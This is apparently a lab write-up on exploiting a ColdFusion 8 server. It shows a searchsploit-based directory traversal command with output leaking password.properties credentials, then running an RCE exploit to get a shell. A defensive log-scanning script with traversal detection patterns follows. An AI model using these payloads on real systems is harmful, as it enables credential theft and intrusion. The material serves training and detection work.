# Intro

- Based on the previous section, we know that the ColdFusion instance is version 8
- Run `searchsploit` to identify any PoCs that apply to version 8

![[images/Pasted image 20260128202603.png]]

- There is an RCE for version 8

```bash
searchsploit coldfusion
```

# Directory Traversal Exploit

- Copy this exploit to the local directory

![[images/Pasted image 20260128203140.png]]

```bash
sudo searchsploit -m 14641
```

- View the exploit

![[images/Pasted image 20260128203307.png]]

- As shown above and below, the script takes 3 arguments: `host`, `port`, `file_path`
- Notice that `python3` does not work, but Python 2 / 2.7 does

![[images/Pasted image 20260128203732.png]]

- Let's try to disclose `ColdFusion8/lib/password.properties` with the command below

```bash
python2.7 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
------------------------------
trying /CFIDE/wizards/common/_logintowizard.cfm
title from server in /CFIDE/wizards/common/_logintowizard.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
...
```

## Unauthenticated RCE Exploit

- Copy this exploit to the local directory

![[images/Pasted image 20260128204002.png]]

```bash
sudo searchsploit -m 50057
```

- View the exploit

![[images/Pasted image 20260128204058.png]]

- Looks like we need to fill in the blanks here

![[images/Pasted image 20260128204143.png]]

# Exercise

## Run the RCE exploit against the target

- Edit `50057.py` as below

![[images/Pasted image 20260128204331.png]]

- Run the exploit and wait a bit

![[images/Pasted image 20260128204426.png]]

```bash
sudo python3 50057.py
```

- Success!
- We have a shell on the webserver

![[images/Pasted image 20260128204531.png]]
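The traversal requests from the Directory Traversal Exploit section above leave a recognisable trace in the web server's access log. The following Python script is an added example, not code from this page or from either Exploit-DB entry: it scans constructed sample log lines (the IPs, timestamps and the `locale` query parameter name are assumptions, not values taken from the walkthrough) for percent-decoded `../` sequences aimed at the `/CFIDE/` tree or at `password.properties`, the file disclosed above, and grades each hit by severity.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in NCSA combined-style format.
# None of these are from the page; the IPs, timestamps and the `locale`
# parameter name are assumptions made for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2026:20:37:32 +0000] "GET /CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties HTTP/1.1" 200 512
10.0.0.7 - - [28/Jan/2026:20:38:01 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 8123
10.0.0.9 - - [28/Jan/2026:20:39:15 +0000] "GET /CFIDE/wizards/common/_logintowizard.cfm?locale=..%252F..%252F..%252FColdFusion8%252Flib%252Fpassword.properties HTTP/1.1" 200 512
10.0.0.11 - - [28/Jan/2026:20:40:00 +0000] "GET /index.cfm?page=../about HTTP/1.1" 404 300
"""

# ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)
TRAVERSAL_RE = re.compile(r'\.\.(/|\\)')   # "../" or "..\" after decoding
SENSITIVE = ("password.properties",)       # the file disclosed in the walkthrough
CFIDE_PREFIX = "/cfide/"                   # ColdFusion admin/wizard tree


def decode_target(target, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded ../ is caught."""
    for _ in range(rounds):
        new = unquote(target)
        if new == target:
            break
        target = new
    return target


def analyze_line(line):
    """Return a finding dict for a traversal attempt, or None if the line is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    if not TRAVERSAL_RE.search(decoded):
        return None
    low = decoded.lower()
    if any(name in low for name in SENSITIVE):
        severity = "high"        # traversal aimed at a credential file
    elif low.startswith(CFIDE_PREFIX):
        severity = "medium"      # traversal via the ColdFusion admin tree
    else:
        severity = "low"         # traversal elsewhere on the site
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "decoded_target": decoded,
        "severity": severity,
    }


def scan_log(text):
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity'].upper():6}] {f['ip']} {f['status']} {f['decoded_target']}")
```

Decoding twice matters: a single `unquote` turns `%252F` into `%2F`, which the traversal check would miss. A high-severity hit against a ColdFusion 8 host, especially one the server answered with a 200, is a signal to rotate the credentials stored in `password.properties`, restrict `/CFIDE/` to administrative networks, and apply the vendor's patches.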